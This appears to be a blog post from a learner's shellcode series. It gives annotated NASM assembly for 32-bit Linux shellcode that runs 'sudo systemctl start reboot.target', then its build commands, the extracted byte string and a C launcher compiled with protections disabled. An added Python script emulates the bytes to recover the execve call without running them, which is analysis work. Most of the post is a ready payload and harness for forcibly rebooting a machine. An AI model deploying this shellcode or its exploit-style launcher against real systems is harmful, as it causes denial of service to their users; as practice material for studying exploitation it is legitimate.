shellcode 1 : Linux/x86 – sudo systemctl start reboot.target

I recently started writing 32-bit shellcodes for Linux, and I will be posting sample shellcodes I created for practice here on this blog. This is one of many shellcodes I have written. This shellcode uses the systemd init system to reboot the machine: it execve()s sudo, which in turn runs systemctl start reboot.target. Let's jump in. You need to know how syscalls are invoked on 32-bit Linux (syscall number in eax, arguments in ebx, ecx, edx, then int 0x80) and some basic assembly to follow this piece of code. The code is self-explanatory with comments.

systmctl_reboot.nasm

———————————————————————————————–

section .text
global _start
_start:

; clear out registers before use (eax = 0 also serves as the NULL terminator pushed below)
xor eax, eax
xor edx, edx

; PUSH "/usr////bin/sudo" (strings are pushed in reverse, 4 bytes at a time, after a NULL dword)
push eax
push 0x6f647573        ; "sudo"
push 0x2f6e6962        ; "bin/"
push 0x2f2f2f2f        ; "////"
push 0x7273752f        ; "/usr"

; execve first argument: ebx = pathname
mov ebx, esp

; PUSH "/bin///systemctl"
push eax
push 0x6c74636d        ; "mctl"
push 0x65747379        ; "yste"
push 0x732f2f2f        ; "///s"
push 0x6e69622f        ; "/bin"
mov ecx, esp           ; ecx temporarily holds the pointer to argv[1]

; PUSH "reboot.target" (push byte still writes a full dword, so "t" arrives with its own NUL padding)
push eax
push byte 0x74         ; "t"
push 0x65677261        ; "arge"
push 0x742e746f        ; "ot.t"
push 0x6f626572        ; "rebo"
mov esi, esp

; PUSH "start"
push eax
push byte 0x74         ; "t"
push 0x72617473        ; "star"
mov edi, esp

; execve second argument: ecx = argv = { sudo, systemctl, "start", "reboot.target", NULL }
push eax               ; NULL that terminates argv
push esi
push edi
push ecx
push ebx
mov ecx, esp

; execve third argument: edx = envp = { NULL }
push eax
mov edx, esp

; mov 11 into eax (syscall number for execve)
mov al, 11
; call the interrupt
int 0x80


Assembling: nasm -f elf32 -o systmctl_reboot.o systmctl_reboot.nasm

Linking: ld -z execstack -o systmctl_reboot systmctl_reboot.o

(On a 64-bit host, add -m elf_i386 to the ld command so that it links a 32-bit ELF.)

Finally, we can extract the machine code bytes with the help of objdump:

objdump -d ./systmctl_reboot -M intel

Final shellcode:

\x31\xc0\x31\xd2\x50\x68\x73\x75\x64\x6f\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73\x72\x89\xe3\x50\x68\x6d\x63\x74\x6c\x68\x79\x73\x74\x65\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe1\x50\x6a\x74\x68\x61\x72\x67\x65\x68\x6f\x74\x2e\x74\x68\x72\x65\x62\x6f\x89\xe6\x50\x6a\x74\x68\x73\x74\x61\x72\x89\xe7\x50\x56\x57\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80

This can be used inside our template C program to trigger the shellcode.


#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x31\xc0\x31\xd2\x50\x68\x73\x75\x64\x6f\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73\x72\x89\xe3\x50\x68\x6d\x63\x74\x6c\x68\x79\x73\x74\x65\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe1\x50\x6a\x74\x68\x61\x72\x67\x65\x68\x6f\x74\x2e\x74\x68\x72\x65\x62\x6f\x89\xe6\x50\x6a\x74\x68\x73\x74\x61\x72\x89\xe7\x50\x56\x57\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80";

int main(void)
{
    /* strlen is safe here only because the shellcode contains no null bytes */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* treat the byte array as a function and jump into it */
    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}


Compile with the stack protector disabled and an executable stack, since the code array lives in a data segment that the program jumps into:

gcc -fno-stack-protector -z execstack -o shellcode shellcode.c

./shellcode

This should trigger a system restart if NOPASSWD has been configured in sudoers for the invoking user, so that sudo can run systemctl without prompting for a password.
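As an added example (not part of the original post), the following Python script replays the listing's xor/push/mov sequence in a tiny stack emulator and recovers the exact execve pathname and argv that the bytes would issue, which is how an analyst can tell what a blob like the one above does without executing it. The shellcode bytes are copied from the listing; the starting esp value and the function names are assumptions.

```python
import struct

# Constructed copy of the shellcode bytes printed above; the emulator below
# models only the xor/push/mov/int encodings this particular payload uses.
SHELLCODE = (
    b"\x31\xc0\x31\xd2\x50\x68\x73\x75\x64\x6f\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73"
    b"\x72\x89\xe3\x50\x68\x6d\x63\x74\x6c\x68\x79\x73\x74\x65\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e"
    b"\x89\xe1\x50\x6a\x74\x68\x61\x72\x67\x65\x68\x6f\x74\x2e\x74\x68\x72\x65\x62\x6f\x89\xe6\x50\x6a"
    b"\x74\x68\x73\x74\x61\x72\x89\xe7\x50\x56\x57\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
)
PUSH_REG = {0x50: "eax", 0x51: "ecx", 0x53: "ebx", 0x56: "esi", 0x57: "edi"}
MOV_REG_ESP = {0xE1: "ecx", 0xE2: "edx", 0xE3: "ebx", 0xE6: "esi", 0xE7: "edi"}
XOR_SELF = {0xC0: "eax", 0xD2: "edx"}


def recover_execve(code, esp=0x1000):
    """Return the (pathname, argv) that this shellcode hands to execve."""
    mem = bytearray(esp)   # stack memory; 0x1000 is an arbitrary assumed start esp
    regs, i = {}, 0
    def push(value):       # the stack grows down, one dword per push
        nonlocal esp
        esp -= 4
        mem[esp:esp + 4] = struct.pack("<I", value & 0xFFFFFFFF)

    while i < len(code):
        op = code[i]
        if op == 0x31:                                   # xor reg, reg
            regs[XOR_SELF[code[i + 1]]] = 0; i += 2
        elif op == 0x68:                                 # push imm32
            push(struct.unpack_from("<I", code, i + 1)[0]); i += 5
        elif op == 0x6A:                                 # push imm8 (sign-extended)
            push(struct.unpack_from("<b", code, i + 1)[0]); i += 2
        elif op in PUSH_REG:                             # push reg
            push(regs[PUSH_REG[op]]); i += 1
        elif op == 0x89 and code[i + 1] in MOV_REG_ESP:  # mov reg, esp
            regs[MOV_REG_ESP[code[i + 1]]] = esp; i += 2
        elif op == 0xB0:                                 # mov al, imm8
            regs["eax"] = (regs["eax"] & 0xFFFFFF00) | code[i + 1]; i += 2
        elif op == 0xCD and code[i + 1] == 0x80:         # int 0x80: the syscall
            break
        else:
            raise ValueError(f"unmodelled opcode {op:#04x} at offset {i}")
    if regs.get("eax") != 11:
        raise ValueError("syscall number in eax is not execve (11)")
    def cstring(addr):     # read a NUL-terminated string out of the emulated stack
        return mem[addr:mem.index(0, addr)].decode()
    argv, p = [], regs["ecx"]
    while struct.unpack_from("<I", mem, p)[0]:
        argv.append(cstring(struct.unpack_from("<I", mem, p)[0])); p += 4
    return cstring(regs["ebx"]), argv
```

Any byte sequence the emulator does not model raises an error rather than being skipped, so a modified payload is reported instead of silently misread.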